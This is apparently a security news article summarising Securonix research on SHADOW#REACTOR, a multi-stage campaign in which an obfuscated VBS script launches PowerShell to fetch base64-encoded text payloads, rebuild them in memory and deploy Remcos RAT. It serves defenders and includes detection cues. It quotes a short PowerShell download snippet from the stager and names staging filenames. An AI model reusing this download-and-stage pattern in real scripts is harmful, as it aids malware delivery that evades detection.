Multi-Stage Windows Malware Invokes PowerShell Downloader Using Text-based Payloads Using Remote Host

Multi-Stage Windows Malware Invokes PowerShell Downloader Using Text-based Payloads Using Remote Host

Security researchers have identified a sophisticated multi-stage Windows malware campaign called SHADOW#REACTOR that represents a significant evolution in delivery mechanisms for remote access tools.

The campaign demonstrates how threat actors combine traditional scripting techniques with modern obfuscation methods to bypass security defenses.

The infection begins with an obfuscated Visual Basic Script that initiates a carefully orchestrated chain of execution stages, each designed to handle specific functions while minimizing detection.

The attack vector relies on user interaction, with victims unknowingly executing a malicious VBS file typically delivered through compromised web resources or social engineering lures.

Once executed, the script launches PowerShell processes that fetch fragmented payload pieces from remote infrastructure. These fragments remain encoded as plain text files, avoiding common binary detection signatures.

Process flow using Procmon (Source - Securonix)
Process flow using Procmon (Source – Securonix)

The modular approach enables attackers to update individual stages independently without restructuring the entire chain.

google

The campaign showcases an unusual combination of living-off-the-land techniques and custom obfuscation layers.

Each execution stage passes control to the next through carefully managed handoffs, ensuring payload integrity across multiple downloads.

The attackers implemented redundancy checks and size validation mechanisms to guarantee successful payload reconstruction.

Securonix analysts identified the malware after the second stage revealed characteristic patterns in PowerShell command construction and base64 decoding operations.

The research team traced the infrastructure connections and matched the final payload signature to Remcos RAT, a commercially available remote administration tool repurposed for malicious use.

Win64.vbs (Source - Securonix)
Win64.vbs (Source – Securonix)

The analysis revealed that Securonix analysts’ initial detection focused on unusual wscript.exe spawning multiple PowerShell instances with extensive inline commands—a distinctive behavioral pattern rarely seen in legitimate Windows operations.

The Text-Only Staging Pipeline: A Novel Delivery Approach

The defining characteristic of SHADOW#REACTOR lies in its unconventional text-based staging mechanism.

Rather than hosting binary payloads directly, attackers maintain encoded content in plain text files including qpwoe32.txt, qpwoe64.txt, teste32.txt, teste64.txt, and config.txt.

.NET Reactor Loader functions (Source - Securonix)
.NET Reactor Loader functions (Source – Securonix)

These files contain base64-encoded assembly code that appears as harmless text data to automated security systems performing routine scans.

The PowerShell stager implements a download loop with minimum size thresholds and timeout mechanisms.

If the retrieved file falls below expected sizes, the script automatically retries the download, ensuring incomplete transmissions don’t interrupt execution.

Decode function (Source - Securonix)
Decode function (Source – Securonix)

This resilience mechanism allows operators to manage payload updates without disrupting the entire infection chain.

Once validation succeeds, subsequent stages decode and reconstruct the content into functional .NET assemblies loaded entirely in memory using reflective loading techniques.

$webClient = New-Object System.Net.WebClient
$uwehj = $webClient.DownloadString($mlkia)
$uwehj | Out-File -FilePath $Iuytq -Encoding UTF8

The text-only approach significantly complicates static detection, as security solutions typically flag binary executables rather than seemingly innocuous text files.

Combined with in-memory execution and process chain obfuscation, this staging pipeline represents a calculated effort to maintain persistence while evading endpoint detection and response systems designed to identify traditional malware delivery patterns.

Follow us on Google News, LinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

googlenews



Source link